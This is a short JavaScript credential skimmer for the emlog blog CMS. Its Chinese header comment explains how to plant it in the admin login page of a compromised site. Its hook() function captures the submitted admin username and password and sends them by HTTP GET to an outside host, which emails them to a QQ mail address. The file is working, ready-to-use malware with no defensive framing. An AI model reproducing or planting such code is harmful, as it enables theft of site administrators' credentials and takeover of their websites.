emlog 劫持后台登录表单.js

/*

Author: Chu
很简单，就是劫持登录表单。
1. 把 js 传到/admin/views/js/ 目录下
2. 后台登录页面/admin/views/login.php 中添加<script src="./views/js/emlog.js"></script> 引入 js。
   form 表单中，添加 onsubmit 事件，onsubmit="hook()"

*/

function createXHR () {
    var xmlhttp;
    if (window.XMLHttpRequest) {
    // code for IE7+, Firefox, Chrome, Opera, Safari
        xmlhttp=new XMLHttpRequest();
    }
    else {
    // code for IE6, IE5
    xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
    }

    return xmlhttp;
}

function get (xhr, url) {
    xhr.open("GET", url, false);
    xhr.send();

    return xhr.responseText;
}

function hook () {
    var username = document.getElementById('user').value;
    var password = document.getElementById('pw').value;
    var mailto = encodeURIComponent("63370505@qq.com"); 
    var title = encodeURIComponent("\u6697\u6708\u7684\u5bc6\u7801\u6765\u4e86");
    var content = encodeURIComponent("\u5e10\u53f7\uff1a"+username+"\n\u5bc6\u7801\u662f\uff1a"+password);
    var xhr = createXHR();
    var url = "http://chuhades.sinaapp.com/message.php?mailto="+mailto+"&title="+title+"&content="+content;
    get(xhr, url);
}